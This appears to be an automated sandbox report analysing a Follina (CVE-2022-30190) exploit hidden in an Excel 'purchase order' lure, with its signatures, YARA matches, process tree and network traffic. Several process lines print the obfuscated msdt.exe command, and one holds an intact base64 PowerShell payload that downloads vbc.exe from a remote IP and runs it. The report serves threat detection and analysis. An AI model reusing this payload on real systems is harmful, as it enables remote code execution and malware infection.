
Windows Analysis Report
purchase order.xlsx

Overview

General Information

Sample Name: purchase order.xlsx
Analysis ID: 653502
MD5: a8930c1fcd80e9965ae26446afb717f6
SHA1: 0cbf04bf7fc8522ab983f0246357fa70a85ee56b
SHA256: c02ff7b4d28a259d37a659a6951dba4ee574562ef5fc3b3a0135640c0370dee2
Tags: VelvetSweatshop, xlsx

Detection

Follina CVE-2022-30190
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Document exploit detected (process start blacklist hit)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Drops PE files to the windows directory (C:\Windows)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 1388 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • msdt.exe (PID: 6596 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'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'+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 2436 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 2320 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 6112 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5636 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 6460 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard | Strings:
  • 0x46b6:$a: PCWDiagnostic
  • 0x1cf4:$sa1: msdt.exe
  • 0x1d30:$sa1: msdt.exe
  • 0x24b4:$sa1: msdt.exe
  • 0x3c55:$sa1: msdt.exe
  • 0x1d44:$sa3: ms-msdt
  • 0x3c5f:$sa3: ms-msdt
  • 0x1e08:$sb3: IT_BrowseForFile=
  • 0x3cc1:$sb3: IT_BrowseForFile=
0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security
0000000D.00000002.511764004.0000000000828000.00000004.00000020.00020000.00000000.sdmp | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard | Strings:
  • 0xa2ae:$a: PCWDiagnostic
  • 0x5e78:$sa1: msdt.exe
  • 0x1908e:$sa1: msdt.exe
  • 0x22c58:$sa1: msdt.exe
  • 0x22e14:$sa1: msdt.exe
  • 0x272c0:$sb3: IT_BrowseForFile=
0000000D.00000002.512140531.00000000009A0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security
0000000D.00000002.512279726.0000000000C80000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: purchase order.xlsx | ReversingLabs: Detection: 17%

Exploits

Source: Yara match | File source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.512140531.00000000009A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.512279726.0000000000C80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\msdt.exe
Source: global traffic | TCP traffic: 192.168.2.4:49773 -> 172.245.119.48:80
Source: excel.exe | Memory has grown: Private usage: 1MB later: 67MB
Source: global traffic | HTTP traffic detected:
    GET /shipping_invc/document.html HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 172.245.119.48
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /870/vbc.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 172.245.119.48
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 200 OK
    Date: Tue, 28 Jun 2022 08:46:37 GMT
    Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
    Last-Modified: Tue, 28 Jun 2022 02:41:13 GMT
    ETag: "6d600-5e278f84f0321"
    Accept-Ranges: bytes
    Content-Length: 448000
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
    Data Raw: (raw hex dump of the response body omitted)
Source: unknown | TCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officeapps.live.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://onedrive.live.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://osi.office.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://otelrules.azureedge.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://roaming.edog.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://settings.outlook.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://staging.cortana.ai
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://tasks.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://wus2.contentsync.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://www.odwebp.svc.ms
        Source: global traffic | HTTP traffic detected: GET /shipping_invc/document.html HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: 172.245.119.48
            Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /870/vbc.exe HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: 172.245.119.48
            Connection: Keep-Alive

        System Summary

        Source: Screenshot number: 4 | Screenshot OCR: enable Editing and Content from the Yellow bar 18" ~ A above to view locked content. 19" pm 20 2
        Source: DiagPackage.dll.13.dr | Static PE information: No import functions for PE file found
        Source: DiagPackage.dll.mui.13.dr | Static PE information: No import functions for PE file found
        Source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-20
        Source: 0000000D.00000002.511764004.0000000000828000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-20
        Source: Process Memory Space: msdt.exe PID: 6596, type: MEMORYSTR | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-20
        Source: DiagPackage.dll.13.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: purchase order.xlsx | ReversingLabs: Detection: 17%
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'…'+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"
        Source: C:\Windows\SysWOW64\msdt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{25D11404-BE86-4B00-8632-AD71AC6E433D} - OProcSessId.dat
        Source: classification engine | Classification label: mal68.expl.winXLSX@10/24@0/1
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
        Source: C:\Windows\SysWOW64\msdt.exe | Automated click: Next
        Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.dll
        Source: C:\Windows\SysWOW64\msdt.exe | File created: C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.mui
        Source: C:\Windows\SysWOW64\msdt.exe | File created: C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exe | Window / User API: threadDelayed 812
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'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'+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"
